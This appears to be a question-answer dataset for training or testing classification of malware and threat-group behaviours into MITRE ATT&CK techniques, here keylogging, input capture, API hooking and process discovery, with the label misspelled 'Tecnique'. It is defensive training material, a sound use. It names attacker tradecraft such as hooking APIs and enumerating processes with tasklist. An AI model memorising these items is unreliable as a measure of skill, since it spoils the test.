+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can capture keystrokes on a compromised host.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT has a built-in keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession has the ability to capture keystrokes on a compromised host.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can use `SetWindowsHookEx` and `GetKeyNameText` to capture keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can record keystrokes from both the keyboard and virtual keyboard.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Regin contains a keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos has a command for keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi gathers and exfiltrates keystrokes from the machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec contains a keylogger component.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT has a plugin for keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rover has keylogging functionality.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RunningRAT captures keystrokes and sends them back to the C2 server.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY has a keylogging capability.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has a keylogging capability.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM can continuously capture keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SslMM creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot contains keylogging functionality to steal passwords.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to capture keystrokes on an infected host.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest uses the CGEventTap functions to perform keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyZBot contains keylogger functionality.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can capture keystrokes on a compromised host.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Unknown Logger is capable of recording keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN collects keystrokes from the victim machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT has the capability to install a live and offline keylogger, including through the use of the `GetAsyncKeyState` Windows API.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XAgentOSX contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda can perform keylogging on the victim’s machine by hooking the functions TranslateMessage and WM_KEYDOWN.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has a feature to capture a remote computer's keystrokes using a keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has a keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT has the capability to log keystrokes from the victim’s machine, both offline and online.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain has the ability to log keyboard events.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT is capable of logging keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty uses a keylogger plugin to gather keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore prompts the user for their credentials.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto presents an input prompt asking for the user's login and password.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok prompts the user for credentials.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Keydnap prompts the users for credentials.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has displayed fake forms on top of banking sites to intercept credentials from victims.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton prompts users for their credentials.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY's `credphisher.py` module can prompt a current user for their credentials.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process /Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: iKitten prompts the user for their credentials.,"Tecnique: T1056.002 Input Capture: GUI Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors modified the JavaScript loaded by the Ivanti Connect Secure login page to capture credentials entered.","Tecnique: T1056.003 Input Capture: Web Portal Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In the Triton Safety Instrumented System Attack, TEMP.Veles captured credentials as they were being changed by redirecting text-based login codes to websites they controlled.","Tecnique: T1056.003 Input Capture: Web Portal Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The IceApple OWA credential logger can monitor for OWA authentication requests and log the credentials.,"Tecnique: T1056.003 Input Capture: Web Portal Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WARPWIRE can capture credentials submitted during the web logon process in order to access layer seven applications such as RDP.,"Tecnique: T1056.003 Input Capture: Web Portal Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM is capable of using Windows hook interfaces for information gathering such as credential access.,"Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has hooked several Windows API functions to steal credentials.,"Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire contains some modules that leverage API hooking to carry out tasks, such as netripper.","Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher hooks processes by modifying IAT pointers to CreateWindowEx.,"Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.,"Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDFSNIFFER hooks several Win32 API functions to hijack elements of the remote system management user-interface.,"Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has the ability to capture RDP credentials by capturing the CredEnumerateA API,"Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.","Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.","Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda hooks processes by leveraging its own IAT hooked functions.,"Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell hooks several API functions to spawn system threads.,"Tecnique: T1056.004 Input Capture: Credential API Hooking, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used Empire to obtain a list of all running processes.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During FunnyDream, the threat actors used Tasklist on targeted systems.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `tasklist` command as part of their advanced reconnaissance.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors obtained a list of running processes on a victim machine using `cmd /c tasklist > %temp%\temp.ini`.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, the threat actors used `tasklist` to collect a list of running processes on an infected system.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used multiple command-line utilities to enumerate running processes.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 gathered a list of running processes on the system using tasklist /v.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that can list out currently running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37's Freenki malware lists running processes using the Microsoft Windows API.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 leveraged Sysmon to understand the processes, services in the organization.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used Windows-based utilities to carry out tasks including tasklist.exe.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has used tasklist to enumerate processes and find a specific string.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used tasklist to enumerate processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel malware can collect a list of running processes on a system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Deep Panda uses the Microsoft Tasklist utility to list processes running on systems.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used Tasklist to obtain information from a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used tools to enumerate processes on target hosts including Process Explorer.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used `tasklist` to enumerate processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has enumerated processes on targeted systems.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa’s shellcode attempted to find the process ID of the current process.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has used a reconnaissance module to identify active processes and other associated loaded modules.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang performs process discovery using tasklist commands.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky can gather a list of all processes running on a victim's machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Several Lazarus Group malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by Lazarus Group also gathers process times.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware can list running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats actors obtained a list of active processes on the victim and sent them to C2 servers.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware to obtain a list of running processes on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used tasklist /v to determine active process information.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has run tasklist on a victim's machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After compromising a victim, Poseidon Group lists all running processes.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke can detect a running process's PID on the infected machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used tools to identify running processes on the victim's machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware gathers a list of running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has searched for rival malware and removes it if found. TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has run `cmd /c start /b tasklist` to enumerate processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper is capable of enumerating the running processes on the system using pslist.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla surveys a system upon check-in to discover running processes using the tasklist /v command. Turla RPC backdoors have also enumerated processes associated with specific open ports or named pipes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has enumerated running processes on targeted systems.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used malware to enumerate active processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti Group looked for a specific process running on infected servers.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: 4H RAT has the capability to obtain a listing of running processes (including loaded modules).,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL can list running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can list the current running processes on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira verifies the deletion of volume shadow copies by checking for the existence of the process ID related to the process created to delete these items.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can enumerate the current process on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to enumerate loaded modules for a process..,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth searches for different processes on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT can examine running processes to determine if a debugger is present.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon has collected information about running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger has the ability to use Tasklist to identify running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has discovered system processes by calling `RmGetList`.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can collect a list of running processes by calling CreateToolhelp32Snapshot.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BACKSPACE may collect information about running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can retrieve a list of running processes from a compromised machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT can list running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BISCUIT has a command to enumerate running processes and identify their owners.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLACKCOFFEE has the capability to discover processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can collect process filenames and SID authority level.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk has the ability to check running processes on a targeted system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has executed the tasklist command.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea collects information about running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit can enumerate all running processes to compare hashes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot identifies processes and collects the process ids.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can identity the current process on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal can obtain a list of running processes on the victim’s machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has gathered a process list by using Tasklist.exe.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bonadan can use the ps command to discover other cryptocurrency miners active on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brave Prince lists the running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can enumerate all processes and locate specific process IDs (PIDs).,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can identify processes associated with analytical tools.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore has used the ps command to list processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER will query running process information to determine subsequent program execution flow.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CaddyWiper can obtain a list of current processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cannon can obtain a list of processes running on the system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak lists running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has collected a list of running processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon can list the processes on the victim’s machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT contains watchdog functionality that ensures its process is always running, else spawns a new instance.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell can gather a list of processes running on the machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes collects its process identifier (PID) on the victim.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower has the ability to list running processes through the use of `tasklist`.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can enumerate processes on a targeted system.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can enumerate all processes on the victim's machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike's Beacon payload can collect information on process details.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie uses the tasklist to view running processes on the victim’s machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can enumerate through all open processes to search for any that have the string “sql” in their process name.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson contains a command to list processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can enumerate processes running on a victim's machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can enumerate the process it is currently running under.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
